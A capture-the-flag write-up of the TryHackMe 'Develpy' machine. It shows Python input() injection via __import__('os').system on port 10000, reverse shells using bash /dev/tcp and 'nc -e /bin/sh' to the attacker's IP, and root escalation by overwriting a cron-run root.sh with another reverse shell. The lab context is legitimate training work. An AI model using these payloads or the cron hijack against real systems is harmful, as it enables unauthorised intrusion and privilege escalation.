THM - Develpy
Introduction
boot2root machine for FIT and bsides Guatemala CTF.
Not much to go on here. This one is Medium rated. Let’s begin.
Ports
Nmap says we’ve got two ports only - SSH on 22 and a mystery port on 10000.
Visiting port 10000 in Firefox presents the following message:
Private 0days
Please enter number of exploits to send??: Traceback (most recent call last): File “./exploit.py”, line 6, innum_exploits = int(input(' Please enther number of exploits to send??: ')) File " ", line 1, in NameError: name 'GET' is not defined
So it looks like a python application of some sort that we don’t interact with via a brower. We’ll move on to netcat.
Netcat
root@kali:/opt/tryhackme/develpy# nc 10.10.97.246 10000
Private 0days
Please enther number of exploits to send??: 1
Exploit started, attacking target (tryhackme.com)...
Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.011 msSo what’s going on here is we enter some number, and we get that number of pings. Now we have to break it.
Breaking it
I tried a few different things; some things produce this message as part of the error:
num_exploits = int(input(‘ Please enther number of exploits to send??: ‘))
So we can see the value being input being cast to an integer with int - actually we saw this earlier when we visited the port in the browser. Trying a few different data types produces more error messages, indicating it wants a string or integer as the expected input. After a bit I tried this:
__import__('os').system('bash -i >& /dev/tcp/10.9.10.123/1234 0>&1')#
Which prompted this error:
sh: 1: Syntax error: Bad fd number
And this indicated that the command was being executed by the system but not being understood (using sh not bash). The next one I tried was:
__import__('os').system('nc -e /bin/sh 10.9.10.123 1234')
And I was on the box.
On the box
Our user is called king. Checking /etc/crontab we can see:
- root cd /home/king/ && bash root.sh
So we have root running a script in our home directory. Nice. We can overwrite the script with our own - I deleted the original and replaced it:
king@ubuntu:~$ echo '#!/bin/bash' >> root.sh
king@ubuntu:~$ echo 'nc -e /bin/sh 10.9.10.123 1235' >> root.sh
Since we know this shell already works, we might as well user it again with a different port number, right? With a new listener we get a root shell and it’s all done; thanks for playing.